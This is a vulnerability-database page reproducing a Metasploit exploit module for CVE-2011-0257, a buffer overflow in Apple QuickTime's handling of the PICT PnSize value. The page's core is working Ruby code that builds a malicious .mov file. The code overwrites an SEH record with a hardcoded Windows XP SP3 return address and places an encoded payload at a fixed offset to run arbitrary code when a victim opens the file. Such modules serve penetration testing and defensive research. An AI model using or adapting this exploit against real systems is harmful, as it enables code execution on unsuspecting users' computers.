Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Apple QuickTime PICT PnSize Buffer Overflow

Related Vulnerabilities: CVE-2011-0257  
Publish Date: 04 Sep 2011
Author: MC, metasploit.com
Source 
                							

                ##
# $Id: apple_quicktime_pnsize.rb 13691 2011-09-03 21:17:58Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apple QuickTime PICT PnSize Buffer Overflow',
      'Description'    => %q{
          This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0.
        When opening a .mov file containing a specially crafted PnSize value, an attacker
        may be able to execute arbitrary code. 
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'MC' ],
      'Version'        => '$Revision: 13691 $',
      'References'     =>
        [
          [ 'CVE', '2011-0257' ],
          [ 'BID', '49144' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => 'true',
        },
      'Payload'        =>
        {
          'Space'    => 750,
          'BadChars' => "",
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
          'DisableNops'  =>  'True',
          'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
          'EncoderOptions' =>
            {
              'BufferRegister' => 'ECX',
            },
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP3', { 'Ret' => 0x672b6d4a } ], # QuickTime.qts 7.60.92.0
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Aug 8 2011',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME',   [ false, 'The file name.',  'msf.mov' ]),
      ], self.class)
  end

  def exploit

    trigger = rand_text_alpha_upper(3324)
    trigger[2302, 8]  = generate_seh_record(target.ret)
    trigger[2310, payload.encoded.size] = payload.encoded

    path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-0257.mov" )
    fd = File.open(path, "rb" )
    sploit = fd.read(fd.stat.size)
    fd.close

    sploit << trigger

    file_create(sploit)
  end
end
__END__
http://mirrors.apple2.org.za/apple.cabi.net/Graphics/PICT.and_QT.INFO/PICT.file.format.TI.txt

Opcode   Name                       Description                  Data Size (in bytes)

$0007    PnSize                     pen size (point)             4
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started